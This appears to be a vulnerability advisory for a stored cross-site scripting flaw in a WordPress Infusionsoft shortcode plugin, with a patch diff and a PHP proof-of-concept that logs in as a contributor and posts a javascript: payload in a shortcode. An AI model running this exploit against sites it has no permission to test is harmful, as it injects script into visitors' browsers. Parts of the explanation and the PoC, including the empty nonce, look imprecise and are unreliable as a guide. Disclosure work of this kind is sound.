Atomic Edge analysis of CVE-2026-11597: This vulnerability is a Stored Cross-Site Scripting (XSS) flaw in the Surbma | Infusionsoft Shortcode plugin for WordPress, versions up to 2.0.1. It allows authenticated users with contributor-level access or higher to inject arbitrary web scripts via the ‘infusionsoft-form’ shortcode attributes. The CVSS score is 6.4, reflecting medium severity with a low attack complexity.
The root cause is insufficient input sanitization and output escaping in the surbma_infusionsoft_shortcode_shortcode() function, located in the /surbma-infusionsoft-shortcode/surbma-infusionsoft-shortcode.php file. The function extracts the ‘account’ and ‘id’ attributes from user-supplied shortcode parameters without proper validation. These attributes are then concatenated directly into a URL string that is embedded in a script tag’s src attribute. Specifically, in lines 37-45 (before patch), the values are assigned with no sanitization: $account = $atts[‘account’]; $id = $atts[‘id’];. The resulting URL is inserted into an HTML string using esc_url() for escaping, but because the dangerous characters are injected before the protocol (e.g., https://), esc_url() does not fully neutralize the XSS vector.
Attackers with contributor-level or above permissions can exploit this by posting or editing a page or post containing the [infusionsoft-form] shortcode. They inject malicious JavaScript into the ‘account’ or ‘id’ attributes, such as: [infusionsoft-form account=”javascript:alert(‘XSS’)” id=”123″]. When a user views the page, the script executes in their browser context. The WordPress AJAX or post editing endpoints are used to submit the shortcode with the payload, which is then stored in the WordPress database and rendered to visitors.
The patch, introduced in version 2.0.2, adds input sanitization using wp_strip_all_tags() on both the ‘account’ and ‘id’ attributes before they are used in the URL. This strips HTML and JavaScript tags from the input, preventing XSS. The patch also adds a second parameter to esc_url() to restrict allowed protocols to ‘https’, further hardening against javascript: or other protocol-based injection. The code diff shows the addition of isset() checks and wp_strip_all_tags() calls on lines 37-40 of the patched file, replacing the direct assignment without sanitization.
Successful exploitation permits attackers to execute arbitrary JavaScript in the context of any user visiting the compromised page. This leads to session hijacking, defacement, redirection to malicious sites, or theft of sensitive data such as cookies and authentication tokens. Because the script executes within the WordPress admin context for logged-in users, an attacker could potentially perform administrative actions on behalf of a victim, such as creating new admin accounts or installing malicious plugins.
Below is a differential between the unpatched vulnerable code and the patched update, for reference.
--- a/surbma-infusionsoft-shortcode/surbma-infusionsoft-shortcode.php
+++ b/surbma-infusionsoft-shortcode/surbma-infusionsoft-shortcode.php
@@ -5,7 +5,7 @@
Plugin URI: https://surbma.com/wordpress-plugins/
Description: A simple shortcode to include Infusionsoft forms into WordPress.
-Version: 2.0.1
+Version: 2.0.2
Author: Surbma
Author URI: https://surbma.com/
@@ -17,17 +17,14 @@
*/
// Prevent direct access to the plugin
-if ( !defined( 'ABSPATH' ) ) {
- die( 'Good try! :)' );
-}
+defined( 'ABSPATH' ) || exit;
// Localization
-function surbma_infusionsoft_shortcode_init() {
+add_action( 'init', function() {
load_plugin_textdomain( 'surbma-infusionsoft-shortcode', false, dirname( plugin_basename( __FILE__ ) ) . '/languages/' );
-}
-add_action( 'plugins_loaded', 'surbma_infusionsoft_shortcode_init' );
+} );
-function surbma_infusionsoft_shortcode_shortcode( $atts ) {
+add_shortcode( 'infusionsoft-form', function( $atts ) {
$atts = shortcode_atts(
array(
'account' => '',
@@ -37,8 +34,11 @@
'infusionsoft-form'
);
- $account = $atts['account'];
- $id = $atts['id'];
+ $account = isset( $atts['account'] ) ? $atts['account'] : '';
+ $account = is_string( $account ) ? wp_strip_all_tags( $account ) : '';
+
+ $id = isset( $atts['id'] ) ? $atts['id'] : '';
+ $id = is_string( $id ) ? wp_strip_all_tags( $id ) : '';
if ( '' === $account || '' === $id ) {
return '';
@@ -54,6 +54,5 @@
$id
);
- return '<script type="text/javascript" src="' . esc_url( $url ) . '"></script>';
-}
-add_shortcode( 'infusionsoft-form', 'surbma_infusionsoft_shortcode_shortcode' );
+ return '<script type="text/javascript" src="' . esc_url( $url, array( 'https' ) ) . '"></script>';
+} );
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-11597 - Surbma | Infusionsoft Shortcode <= 2.0.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes
$target_url = 'http://example.com'; // Change to the target WordPress site URL
$username = 'contributor'; // Contributor or higher account username
$password = 'password'; // Account password
// Step 1: Authenticate and get cookies
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, 'log=' . urlencode($username) . '&pwd=' . urlencode($password) . '&wp-submit=Log+In&redirect_to=' . urlencode($target_url . '/wp-admin/') . '&testcookie=1');
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_HEADER, 0);
$response = curl_exec($ch);
curl_close($ch);
// Step 2: Create a new post with the vulnerable shortcode
$post_title = 'XSS Test Post - ' . time();
$post_content = '[infusionsoft-form account="javascript:alert(1)" id="123"]';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/post-new.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, 'post_title=' . urlencode($post_title) . '&content=' . urlencode($post_content) . '&post_status=publish&post_type=post&_wpnonce=');
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_HEADER, 1);
$response = curl_exec($ch);
curl_close($ch);
// Extract the post URL from the Location header or the response
// For simplicity, we just print a message and the attacker would manually check
echo "PoC executed. Check the target site for a new post with XSS payload.n";
echo "If vulnerable, viewing the post will trigger the JavaScript.n";
// Clean up (optional) - it is recommended to verify the post is created and then delete it manually
?>
